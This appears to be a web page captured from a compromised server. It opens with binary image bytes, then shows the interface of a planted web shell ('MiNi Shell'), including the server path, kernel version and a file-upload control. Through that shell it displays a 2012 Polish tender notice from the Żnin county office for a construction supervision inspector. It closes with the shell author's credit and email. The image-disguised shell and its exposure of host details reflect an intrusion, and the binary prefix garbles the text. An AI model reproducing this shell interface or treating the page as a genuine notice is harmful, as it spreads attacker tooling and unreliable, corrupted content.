JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/124607-N-2012.html

<p class="kh_header"><b>Żnin: Pełnienie funkcji inspektora nadzoru inwestorskiego w specjalności:  instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych , gazowych, wodociągowych  i kanalizacyjnych i konstrukcyjno -  budowlanej w ramach zadania inwestycyjnego  pn.  Termomodernizacja obiektów użyteczności publicznej będących własnością Powiatu Żnińskiego.</b><br>
<b>Numer ogłoszenia: 124607 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Żninie , ul. Potockiego 1, 88-400 Żnin, woj. kujawsko-pomorskie, tel. 052 3031100, faks 052 3031302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.znin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego w specjalności:  instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych , gazowych, wodociągowych  i kanalizacyjnych i konstrukcyjno -  budowlanej w ramach zadania inwestycyjnego  pn.  Termomodernizacja obiektów użyteczności publicznej będących własnością Powiatu Żnińskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa pełnienia funkcji inspektora nadzoru inwestorskiego  w specjalności:  instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych  i kanalizacyjnych i konstrukcyjno -  budowlanej branży sanitarnej  i konstrukcyjno - budowlanej realizowanymi w ramach zadania inwestycyjnego pn. Termomodernizacja budynków użyteczności publicznej będących własnością Powiatu Żnińskiego:
1.Termomodernizacja budynku Zespołu Szkół Ekonomiczno - Handlowych w Żninie,   ul. Śniadeckich 18,
2.Termomodernizacja Budynków Zespołu Szkół Ponadgimnazjalnych w Żninie,  
ul. Browarowa 14,
3.; Termomodernizacja Budynku Głównego Szpitala Pałuckiego Centrum Zdrowia Sp. z o. o.  w Żninie,  ul. Szpitalna 30,
4. Termomodernizacja Budynku Oddziału Ginekologiczno - Położniczego Pałuckiego Centrum Zdrowia Sp. z o. o. w Żninie, ul. Szpitalna 30.
5.Termomodernizacja Budynku Poradni Specjalistycznych Pałuckiego Centrum Zdrowia Sp. z o. o. w Żninie, ul. Szpitalna 30,
6.Termomodernizacja Budynku Administracyjnego wraz z Prosektorium Pałuckiego Centrum Zdrowia sp. z o. o. w Żninie, ul. Szpitalna 30.
Do obowiązków Inspektora należy pełny zakres czynności określonych w  przepisach ustawy z dnia 07 lipca  1994 r. Prawo Budowlane oraz czynności dodatkowe w szczególności:
3. W razie stwierdzenia w dokumentacji  projektowej, przed rozpoczęciem robót budowlanych  bądź w toku ich  realizacji, wad lub niedokładności albo też konieczności wprowadzenia w dokumentacji zmian w celu zastosowania innych rozwiązań konstrukcyjnych lub innych materiałów niż przewidziane  w dokumentacji projektowej lub w celu osiągnięcia oszczędności i obniżenia kosztów budowy,  Inspektor jest zobowiązany zwrócić się z wnioskiem do Zamawiającego o przeprowadzenie w dokumentacji zmian i poprawek w terminie uzgodnionym z wykonawcą.
4. Wprowadzanie  poprawek   w  dokumentacji  projektowej  nie  powodujące zwiększenia  kosztów  nadzorowanych  robót  budowlanych, które  nie wpłyną  zasadniczo na rozwiązania  konstrukcyjne , technologiczne i  instalacyjne oraz  nie powodują  pogorszenia  parametrów  technicznych,  użyteczności  obiektu  lub  jego  wpływu  na  środowisko  i  bezpieczeństwo obiektu, w   uzgodnieniu   z  autorem projektu,  Zamawiającym  i  kierownikiem budowy, dokonując  odpowiedniego wpisu w dzienniku budowy oraz za zgodą projektanta nanosząc  te  poprawki  w  dokumentacji  projektowej.  
5. Nadzorowanie  budowy  podczas wykonywania robót budowlanych w  takich  odstępach  czasu,  aby  była  zapewniona  skuteczność wykonywanej funkcji inspektora nadzoru inwestorskiego    lecz nie mniej niż dwa razy w tygodniu. 
6. Weryfikacja robót pod kątem wstępnego i ostatecznego odbioru robót.
7. W  czasie  każdorazowego  pobytu  na  budowie  Inspektor  ma  obowiązek  dokonywania  bieżącego przeglądu dziennika budowy oraz potwierdzenia swojej bytności i dokonanych  czynności  stosownym  zapisem .
8. W porozumieniu z kierownikiem budowy, rozstrzyga wątpliwości natury technicznej powstałe  w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu  bądź rzeczoznawców. W sprawach objętych zakresem nadzoru autorskiego Inspektor działa w uzgodnieniu z przedstawicielem nadzoru autorskiego .
9. Kontrola  zgodności  przebiegu  robót  z  obowiązującym  harmonogramem  rzeczowo - finansowym oraz  terminów  ich wykonania,
10. Kontrolowanie  rozliczeń  budowy  pod  względem  rzeczowo-finansowym  oraz  materiałowym.  
11. Kontrola  prawidłowości  zafakturowania  wykonanych  robót  oraz  parafowanie  faktur  i protokółów odbioru  robót.
12. Kontrola  ilości  i  wartości  wykonanych  robót  przed  odbiorem  końcowym przedmiotu  umowy.
13. Kontrola  prawidłowości   prowadzenia  dziennika  budowy oraz  dokonywania w nim  wpisów  stwierdzających  wszystkie  okoliczności  mające  znaczenie  dla  oceny  właściwego  wykonania  robót .
14. Inspektor,  w  razie konieczności lub przerwy w robotach, ustala ilość, jakość oraz wartość  robót w zakresie niezbędnym do rozliczeń z Zamawiającym.
15. Inspektor potwierdza  w  dzienniku  budowy  zapis  kierownika  budowy o  gotowości  obiektu  do  odbioru.
16. Po  ostatecznym  dokonaniu  odbioru  obiektu,  Inspektor  przejmuje  od  kierownika  budowy  dokumentację   techniczną  oraz  dokumentację  powykonawczą  oraz  dziennik  budowy, które po sprawdzeniu i stwierdzeniu ich kompletności przekazuje Zamawiającemu .
17. W  razie  stwierdzenia  wad  Inspektor bierze  udział  w  komisjach  powołanych  do  stwierdzenia  ujawnionych  wad   oraz  kontroluje  usunięcie tych  wad .                                                              
18. Inspektor bierze udział w komisjach technicznych  powołanych  do  oceny  lub  rozstrzygania  technicznych  spraw  budowy  w  toku  jej  realizacji.
19. Inspektor może  żądać  dokonania  przez  wykonawcę ,  na  jego  koszt ,   odkrywek  elementów  robót  budzących  wątpliwości  w  celu  sprawdzenia  jakości  ich  wykonania ,  jeżeli  wykonanie  tych  robót  nie  zostało zgłoszone  do  sprawdzenia  przez ich zakryciem,  a  także  dokonania  prób niszczących (odkucia, wycinki  itp. )  wykonanych  robót ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego oświadczenia zgodnie z wymogiem            art. 22 ust. 1 ustawy Prawo zamówień publicznych. oraz  na podstawie wykazu osób, którymi Wykonawca dysponuje lub będzie dysponował  przy wykonaniu niniejszego zamówienia osobą/ami posiadającą/ymi wymagane uprawnienia Inspektora nadzoru inwestorskiego robót branży sanitarnej i konstrukcyjno - budowlanej posiadającą/ymi doświadczenie, w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika robót  co najmniej nad realizacją min. 2 robót budowlanych o podobnym charakterze i złożoności  do przedmiotu niniejszego zamówieni</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Weryfikacja spełnienia warunku będzie następować na podstawie złożonego Oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego zgodnie z art. 22 ustawy  oraz opłaconą polisę, a w przypadku jej braku inny dokument w zakresie niezbędnym do wykazania spełnienia warunku sytuacji ekonomicznej i finansowej potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę minimum 200.000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykaz  nadzorowanych robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  nad minimum 2 robotami budowlanymi dotyczącymi wykonania termomodernizacji obiektu budowlanego o wartości co najmniej 2.000.000,00 złotych  brutto oraz załączeniem dokumentu potwierdzającego, że roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone - według załącznika nr 4 do niniejszej SIWZ.
- opłaconą polisę, a w przypadku jej braku inny dokument w zakresie niezbędnym do wykazania spełnienia warunku sytuacji ekonomicznej i finansowej potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia na kwotę minimum 200.000,00 złotych.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego z uwzględnieniem istotnych dla stron postanowień, które zostaną wprowadzone do treści zawieranej umowy, określone we wzorze umowy stanowiącym załącznik nr 6 do SIWZ.
2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy za wyjątkiem sytuacji określonych w ust. 3 niniejszego rozdziału.
3. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków:
a)powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
b)zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia, Zamawiający dopuszcza możliwość zmiany umowy, w szczególności termin realizacji zamówienia.
c)zmiany ustawowej wysokości VAT, w przypadku gdy w trakcie realizacji przedmiotu umowy nastąpi ustawowa zmiana stawki VAT dla usług objętych przedmiotem umowy.
4. Zmiany zawartej umowy wymagają aneksu, pod rygorem nieważności w formie pisemnej.
5. Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
6. Przed podpisaniem umowy o wykonanie przedmiotu zamówienia Zamawiający zażąda od wybranego Wykonawcy przedłożenia oryginału lub kserokopii uprawnień Inspektora nadzoru inwestorskiego robót branży sanitarnej i konstrukcyjno - budowlanej oraz zaświadczenia o przynależności tej osoby do izby samorządu zawodowego. Kserokopie tych dokumentów muszą być poświadczone za zgodność z oryginałem przez Wykonawcę lub podmioty, których dotyczą te dokumenty ( w przypadku gdy dokumenty dotyczą podmiotów, z zasobów których korzystać będzie Wykonawca w trakcie realizacji zamówienia, na podstawie art. 26 ust. 2B ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.znin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Żninie,  ul. Potockiego 1 biuro nr 12 I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Żninie,  ul. Potockiego 1 biuro nr 12 I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com